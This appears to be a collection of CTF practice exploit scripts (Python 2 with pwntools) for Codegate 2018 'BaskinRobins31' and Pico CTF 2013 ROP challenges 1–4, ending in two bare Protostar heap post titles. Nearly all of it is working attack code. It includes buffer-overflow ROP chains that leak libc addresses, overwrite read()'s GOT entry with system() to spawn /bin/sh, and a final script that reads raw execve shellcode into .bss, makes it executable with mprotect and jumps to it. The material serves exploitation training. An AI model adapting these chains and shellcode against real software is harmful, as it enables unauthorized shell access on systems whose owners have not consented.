
exploit.py


from pwn import *


# Codegate 2018 Quals "BaskinRobins31" practice solve (Python 2 / pwntools).
# Flow, as written below: overflow the stack buffer with a ROP chain that
# (1) leaks read()'s resolved libc address via write(), (2) reads "/bin/sh"
# into .bss, (3) overwrites read()'s GOT entry with the address of system(),
# and (4) calls read@plt -- now system -- with the .bss string as argument.
# Every address here is a hard-coded constant for one specific binary/libc.
p = process("./baskin")


# Addresses inside the (non-PIE) target binary.
write_plt = 0x4006d0

# Gadget named as pop/pop/pop/ret; presumably `pop rdi; pop rsi; pop rdx; ret`,
# since exactly three values are pushed after it before every call below.
# TODO confirm against the binary's disassembly.
pppr = 0x40087a

read_plt = 0x400700

read_got = 0x602040

# Writable .bss slot used as scratch space for the "/bin/sh" string.
bss = 0x0000000000602090

# read - system, computed from two addresses observed in one run.
# NOTE(review): this offset is tied to that exact libc build; a different
# libc makes the `system` value computed below wrong.
distance = 0x7f01512ac070 - 0x7f01511eb440

# 8 bytes including the terminator, which is also the length passed to read() in chain 2.
binsh="/bin/sh\x00"


# Padding up to the saved return address (0xb0 + 8; presumably buffer + saved rbp).
payload = "A"*(0xb0+8)

# Chain 1: write(1, read_got, 8) -- leaks the 8-byte GOT entry of read() to stdout.
payload += p64(pppr)

payload += p64(1)

payload += p64(read_got)

payload += p64(8)

payload += p64(write_plt)


# Chain 2: read(0, bss, 8) -- stores "/bin/sh\x00" (sent later via p.send) in .bss.
payload += p64(pppr)

payload += p64(0)

payload += p64(bss)

payload += p64(len(binsh))

payload += p64(read_plt)


# Chain 3: read(0, read_got, 8) -- overwrites read()'s GOT entry with the
# system address sent later via p.sendline(system).
payload += p64(pppr)

payload += p64(0)

payload += p64(read_got)

payload += p64(8)

payload += p64(read_plt)


# Chain 4: read@plt now resolves to system, so this is system(bss) == system("/bin/sh").
# First pop takes bss as the argument; the 16 filler bytes land in the other two registers.
payload += p64(pppr)

payload += p64(bss)

payload += "A"*16

payload += p64(read_plt)


# Consume the menu prompt printed by the target before it reads input.
print p.recvuntil("(1-3)\n")


p.sendline(payload)

# Banner the target prints after the overflowing input, before chain 1 runs.
print p.recvuntil("Don't break the rules...:( \n")


# The 8 bytes written by chain 1: read()'s libc address.
read = u64(p.recv(8))

system = p64(read-distance)

# Consumed by chain 2 (read into bss).
p.send(binsh)

# Short pause so the second read() returns before the next data arrives;
# presumably needed to keep the two sends from being merged into one read.
sleep(0.5)

# Consumed by chain 3 (read into read_got). sendline adds a newline, but the
# read() length is 8, so only the address bytes are stored.
p.sendline(system)

p.interactive()



rop1.py


from pwn import *


# Pico CTF 2013 ROP 1 (Python 2 / pwntools): plain ret2func, overwriting the
# saved return address with the address of an in-binary function.
p = process("./rop1")


# Address in the binary that the return address is redirected to; named as the
# shell-spawning function, assumed from the name.
shell = 0x080484A4


# Padding up to the saved return address (0x88 + 4; presumably buffer + saved ebp).
payload = "A"*(0x88+4)

payload += p32(shell)


p.sendline(payload)


p.interactive()



rop2.py


from pwn import *


# Pico CTF 2013 ROP 2 (Python 2 / pwntools), 32-bit ret2libc:
# leak read()'s GOT entry with write(), overwrite that entry with system()'s
# address via read(), then call read@plt (now system) with an in-binary
# "/bin/sh" pointer. All addresses are hard-coded for one binary/libc.
p = process("./rop2")


# Addresses inside the (non-PIE) target binary.
write_plt = 0x80483d0

read_plt = 0x8048380

read_got = 0x804a000

# pop/pop/pop/ret gadget used to clear the three call arguments off the stack
# between chained calls (32-bit cdecl: arguments are on the stack).
pppr = 0x804859d

# Address in the binary, presumably of a "/bin/sh" string (assumed from the name).
binsh = 0x08048610

# read - system, computed from two addresses observed in one run.
# NOTE(review): tied to that exact libc build.
distance = 0xf7e66cb0 - 0xf7dbd200


# Padding up to the saved return address (0x88 + 4; presumably buffer + saved ebp).
payload = "A"*(0x88+4)

# Chain 1: write(1, read_got, 4) -- leaks the 4-byte GOT entry of read().
# Layout: callee, return address (pppr), then the three arguments.
payload += p32(write_plt)

payload += p32(pppr)

payload += p32(1)

payload += p32(read_got)

payload += p32(4)


# Chain 2: read(0, read_got, 4) -- overwrites read()'s GOT entry with the
# address sent later via p.sendline(system).
payload += p32(read_plt)

payload += p32(pppr)

payload += p32(0)

payload += p32(read_got)

payload += p32(4)


# Chain 3: read@plt now resolves to system; the 4 filler bytes are its
# (unused) return address, binsh is its single argument.
payload += p32(read_plt)

payload += "A"*4

payload += p32(binsh)


p.sendline(payload)

# The 4 bytes written by chain 1 are read()'s libc address.
# NOTE(review): nothing is consumed before this recv, so it assumes the target
# prints nothing else before the chain runs.
system = p32(u32(p.recv(4))-distance)

# Consumed by chain 2; the read() length is 4, so the trailing newline is not stored.
p.sendline(system)

p.interactive()



rop3.py

from pwn import *

# Pico CTF 2013 ROP 3 (Python 2 / pwntools), 32-bit ret2libc with the
# "/bin/sh" string supplied via stdin into .bss: leak read()'s GOT entry with
# write(), read "/bin/sh" into .bss, overwrite the GOT entry with system()'s
# address, then call read@plt (now system) with the .bss string.
p = process("./rop3")

# Addresses inside the (non-PIE) target binary.
write_plt = 0x80483a0
# pop/pop/pop/ret gadget that clears the three stack arguments between calls.
pppr = 0x804855d
read_plt = 0x8048360
read_got = 0x804a000
# Writable .bss slot used as scratch space for the "/bin/sh" string.
bss = 0x0804a020
# read - system from two addresses observed in one run; tied to that libc build.
distance = 0xf7e3acb0 - 0xf7d91200
# 8 bytes including the terminator; also the length passed to read() in chain 2.
binsh = "/bin/sh\x00"

# Padding up to the saved return address (0x88 + 4; presumably buffer + saved ebp).
payload = "A"*(0x88+4)
# Chain 1: write(1, read_got, 4) -- leak read()'s GOT entry.
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)

# Chain 2: read(0, bss, 8) -- store "/bin/sh\x00" (sent via p.send below) in .bss.
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len(binsh))

# Chain 3: read(0, read_got, 4) -- overwrite read()'s GOT entry with system's address.
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)

# Chain 4: read@plt now resolves to system; filler return address, bss as argument.
payload += p32(read_plt)
payload += "A"*4
payload += p32(bss)


p.sendline(payload)
# 4 leaked bytes from chain 1: read()'s libc address (assumes no other output precedes it).
read = u32(p.recv(4))
system = p32(read-distance)
# Consumed by chain 2 (read into bss).
p.send(binsh)
# Consumed by chain 3 (read into read_got); the newline is beyond the 4-byte read length.
p.sendline(system)
p.interactive()



rop4.py


from pwn import *


# Pico CTF 2013 ROP 4 (Python 2 / pwntools): read shellcode into .bss, make
# that page executable with mprotect(), then return into it. The function
# addresses are direct (not PLT), so the target is presumably statically linked.
p = process("./rop4")


# Direct addresses of read() and mprotect() inside the binary.
read = 0x8053d20

mprotect = 0x8054990

# pop/pop/pop/ret gadget that clears the three stack arguments between calls.
pppr = 0x80c5e4c

# Page-aligned .bss address (mprotect() requires page alignment); also the
# destination of the shellcode and the final return target.
bss = 0x80f0000

# 25-byte x86 shellcode: execve("/bin//sh", ...) via int 0x80 (decoded from the bytes).
shellCode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"


# Padding up to the saved return address (0x88 + 4; presumably buffer + saved ebp).
payload = "A"*(0x88+4)

# Chain 1: read(0, bss, len(shellCode)) -- copies the shellcode sent below into .bss.
payload += p32(read)

payload += p32(pppr)

payload += p32(0)

payload += p32(bss)

payload += p32(len(shellCode))


# Chain 2: mprotect(bss, len(shellCode), 7) -- 7 = PROT_READ|PROT_WRITE|PROT_EXEC,
# so the page holding bss becomes executable (the kernel rounds the length up to a page).
payload += p32(mprotect)

payload += p32(pppr)

payload += p32(bss)

payload += p32(len(shellCode))

payload += p32(7)


# Final return address: jump to the shellcode now sitting in .bss.
payload += p32(bss)


p.sendline(payload)

# Consumed by chain 1; read() takes exactly len(shellCode) bytes, the newline is left over.
p.sendline(shellCode)

p.interactive()



Protostar Heap1

2019. 7. 24. 01:14


Protostar heap0

2019. 7. 24. 01:14
